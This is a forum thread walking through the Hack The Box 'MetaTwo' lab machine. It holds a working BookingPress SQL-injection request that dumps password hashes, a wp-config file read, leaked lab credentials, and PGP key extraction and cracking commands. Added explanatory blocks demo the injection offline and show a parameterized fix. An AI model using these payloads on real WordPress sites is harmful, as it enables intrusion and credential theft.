MetaTwo - HTB [Discussion]
(October 29, 2022, 08:47 PM)chamo20 Wrote:
(October 29, 2022, 08:41 PM)mesutyldrm Wrote:
(October 29, 2022, 08:36 PM)chamo20 Wrote: [php]<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
* Authentication Unique Keys and Salts.
* @since 2.6.0
*/
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
* WordPress Database Table prefix.
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
[/php]

How did you find this, sir? I tried /var/www/html/wp-config.php, /var/www/metapress.htb/wp-config.php and /var/www/metapress/wp-config.php, but it didn't work.


As it was an nginx server, I first read /etc/nginx/sites-enabled/default, and its content had the root path /var/www/metapress.htb/blog.

how did you read that?
Reply
nice one thanks
Reply
(October 29, 2022, 09:36 PM)may123a Wrote:
(October 29, 2022, 09:34 PM)puuuuuuuuuuuullo Wrote: What to do next after decrypting the key and getting the pass? I'm not able to ssh as root.


How do you solve the problem when you can't find the PGP armor?


Use this to extract the pkey:

# tail -n +N prints from line N to the end of the file, so this keeps the whole block from the BEGIN line onward
tail -n +$(awk '/BEGIN PGP PRIVATE/{ print NR; exit }' ~/.passpie/.keys) ~/.passpie/.keys > private.key

Or do it manually.


(October 29, 2022, 09:34 PM)puuuuuuuuuuuullo Wrote: What to do next after decrypting the key and getting the pass? I'm not able to ssh as root.


su -
Reply
Rooted it! Thanks for all the hints, guys! I think this is a very nice machine!
Reply
(October 29, 2022, 09:15 PM)tmpuser123 Wrote: For the web config, you can also find it by using ../wp-config.php


Yes, also read this writeup: https://classroom.anir0y.in/post/tryhackme-wordpresscve202129447/
Reply
(October 29, 2022, 06:56 PM)11231123 Wrote: Good luck everyone!


thx
Reply
(October 29, 2022, 09:08 PM)loge23 Wrote:
(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP ME


declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`



passpie copy ssh --to stdout


Thanks
Reply
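The two posts above ("Use this to extract pkey" and "Any idea about how to decrypt it?") come down to the same two text-extraction problems: pulling the armored private key block out of ~/.passpie/.keys so it can be fed to gpg2john and gpg --import, and recovering a proper PGP armor from the credential file. passpie stores the encrypted password as a single-quoted YAML scalar, which is why every armor line in the quoted root@ssh entry is indented and separated by a blank line; feeding that to gpg as-is fails. The following is an added example, not code from the thread or from passpie itself. The sample .keys and credential file are constructed stand-ins with placeholder base64, and the assumption that .keys holds the public block before the private block is mine.

```python
import re
import sys

# Constructed stand-in for ~/.passpie/.keys (placeholder base64, not real key material).
# Assumption: the file holds an armored public key block followed by the private key block.
SAMPLE_KEYS = """\
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=AAAA
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----

lQOYBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=BBBB
-----END PGP PRIVATE KEY BLOCK-----
"""

# Constructed stand-in for a passpie credential file such as ~/.passpie/ssh/root.pass.
# passpie writes the encrypted password as a single-quoted YAML scalar, so the armor
# lines are indented and separated by blank lines, just like the entry quoted above.
SAMPLE_CREDENTIAL = """\
comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOZmFrZWNpcGhlcnRleHQ=

  =AAAA

  -----END PGP MESSAGE-----

  '
"""

PRIVATE_BLOCK_RE = re.compile(
    r"-----BEGIN PGP PRIVATE KEY BLOCK-----.*?-----END PGP PRIVATE KEY BLOCK-----",
    re.DOTALL,
)


def extract_private_key(keys_text: str) -> str:
    """Return only the armored private key block (what gpg2john and gpg --import want)."""
    m = PRIVATE_BLOCK_RE.search(keys_text)
    if m is None:
        raise ValueError("no PGP PRIVATE KEY BLOCK in input")
    return m.group(0) + "\n"


def unfold_passpie_password(cred_text: str) -> str:
    """Rebuild the PGP message from passpie's single-quoted YAML 'password' scalar.

    YAML flow-scalar folding: indentation of continuation lines is dropped, a single
    line break folds to one space, and each further empty line becomes one newline.
    Applying those rules turns the blank-line-separated armor back into a file that
    gpg --decrypt accepts.
    """
    m = re.search(r"^password: '(.*?)'[ \t]*$", cred_text, re.DOTALL | re.MULTILINE)
    if m is None:
        raise ValueError("no single-quoted password scalar found")
    chunks = []
    pending_breaks = 0
    for raw in m.group(1).split("\n"):
        line = raw.strip()
        if not line:
            pending_breaks += 1
            continue
        if chunks:
            chunks.append("\n" * pending_breaks if pending_breaks else " ")
        chunks.append(line)
        pending_breaks = 0
    return "".join(chunks) + "\n"


if __name__ == "__main__":
    # Usage: python3 passpie_extract.py ~/.passpie/.keys ~/.passpie/ssh/root.pass
    # With no arguments the constructed samples above are used.
    if len(sys.argv) == 3:
        keys_text = open(sys.argv[1]).read()
        cred_text = open(sys.argv[2]).read()
    else:
        keys_text, cred_text = SAMPLE_KEYS, SAMPLE_CREDENTIAL
    with open("private.key", "w") as f:
        f.write(extract_private_key(keys_text))
    with open("root_ssh.asc", "w") as f:
        f.write(unfold_passpie_password(cred_text))
    print("wrote private.key and root_ssh.asc; next:")
    print("  gpg2john private.key > hash && john --wordlist=rockyou.txt hash")
    print("  gpg --import private.key && gpg --decrypt root_ssh.asc")
```

private.key is what the tail/awk one-liner and the `declare -i line=...` grep in the posts above were trying to produce; root_ssh.asc is the same armor that `passpie copy ssh --to stdout` decrypts internally, here written out so gpg can be pointed at it directly once the passphrase has been cracked.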
I am going to put the steps here:

1) SQLi via plugin

wpscan --url http://metapress.htb --enumerate vp --plugins-detection aggressive

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=74pk14hrurabal16gtg4cm2vej

action=bookingpress_front_get_category_services&_wpnonce=5a815c3989&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -

The wpnonce must be changed and can be found in the response to /events.

Crack the hashes obtained

2) Login as manager

Escalate using: https://www.youtube.com/watch?v=tE8Smz1Jvb8
https://tryhackme.com/room/wordpresscve202129447

Note that since it is a WordPress site you must use ../WP_FILE.php as the file.

I read ../wp-config.php

To decode the base64 refer to the tryhackme room.

3) wp-config.php leaks the FTP creds

4) connect to the FTP

5) retrieve send_email.php from the FTP server

6) this contains the user cred

7) linpeas.sh will show you that there is a weird hidden folder in the home of the user

8) cat /home/jnelson/.passpie/.keys

9) Copy the private key into a file on your Kali machine, then:
gpg2john private.key > hash
john --wordlist=rockyou.txt hash

10) /home/jnelson/.passpie/ssh will contain the passwords of the user and root in a pgp encrypted message

11) Copy the contents of root.pass in the ssh folder to the /tmp folder; I named it root2.pass.
Run "passpie export root2.pass" in the /tmp folder and enter the password you cracked with john.

12) cat the root2.pass, you will get the password
Reply
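Step 1 of the list above is a UNION-based injection: the `total_service` value is not quoted, so the leading `-7502)` closes the parenthesis the plugin's SQL left open, `UNION ALL SELECT` appends a nine-column row built from wp_users (the column count has to match the original SELECT), and `-- -` comments out whatever follows. The block below is an added example of that mechanism, not BookingPress's code: it runs the page's payload shape against a hypothetical, string-built query over an in-memory SQLite database with constructed sample rows, then shows the parameterized form that stops it. `sqlite_version()` stands in for MySQL's `@@version_compile_os`, which SQLite does not have.

```python
import sqlite3

# Constructed sample data (not from the box): a wp_users table, plus a nine-column
# table standing in for the plugin's services table so the payload's column count lines up.
SAMPLE_USERS = [("admin", "$P$Bsamplehash1"), ("manager", "$P$Bsamplehash2")]
SAMPLE_SERVICES = [
    (1, 33, "Consultation", 50.0, "", "", "", "", ""),
    (2, 34, "Follow-up", 25.0, "", "", "", "", ""),
]

# The page's payload, with the MySQL-only @@version_compile_os swapped for SQLite's
# sqlite_version() so the example runs offline.
PAYLOAD = (
    "-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),"
    "sqlite_version(),1,2,3,4,5,6 from wp_users-- -"
)

SERVICE_COLUMNS = "service_id, category_id, service_name, price, c5, c6, c7, c8, c9"


def build_db() -> sqlite3.Connection:
    """In-memory database holding the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_users(user_login TEXT, user_pass TEXT)")
    con.executemany("INSERT INTO wp_users VALUES (?, ?)", SAMPLE_USERS)
    con.execute(f"CREATE TABLE services({SERVICE_COLUMNS})")
    con.executemany("INSERT INTO services VALUES (?,?,?,?,?,?,?,?,?)", SAMPLE_SERVICES)
    return con


def vulnerable_lookup(con: sqlite3.Connection, category_id: str, total_service: str) -> list:
    """Hypothetical mock of the unsafe pattern: request values spliced straight into SQL.

    The parenthesised condition is what the payload's leading ')' closes; everything after
    the injected '-- -' (the rest of the WHERE and the ORDER BY) becomes a comment.
    """
    sql = (
        f"SELECT {SERVICE_COLUMNS} FROM services "
        f"WHERE (category_id = {category_id} AND service_id > {total_service}) "
        f"ORDER BY service_id"
    )
    return con.execute(sql).fetchall()


def safe_lookup(con: sqlite3.Connection, category_id: str, total_service: str) -> list:
    """Hardened form: coerce to int and bind as parameters (the equivalent of
    $wpdb->prepare() with %d placeholders). int() raises on the payload; PHP's intval()
    would coerce it to -7502 instead, and in both cases no SQL text comes from the request.
    """
    cat, total = int(category_id), int(total_service)
    sql = (
        f"SELECT {SERVICE_COLUMNS} FROM services "
        "WHERE (category_id = ? AND service_id > ?) ORDER BY service_id"
    )
    return con.execute(sql, (cat, total)).fetchall()


if __name__ == "__main__":
    con = build_db()
    print("legit:", vulnerable_lookup(con, "33", "0"))
    print("injected:", vulnerable_lookup(con, "33", PAYLOAD))
    try:
        safe_lookup(con, "33", PAYLOAD)
    except ValueError as e:
        print("hardened query rejected the payload:", e)
```

The injected call returns the real service row followed by one extra row whose first two columns are the comma-joined logins and password hashes of every wp_users entry, which is exactly the material step 1 says to crack; the hardened function never lets the request string reach the SQL at all.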
(October 29, 2022, 09:08 PM)loge23 Wrote:
(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


ty
Reply
(October 29, 2022, 09:08 PM)loge23 Wrote:
(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


great
Reply

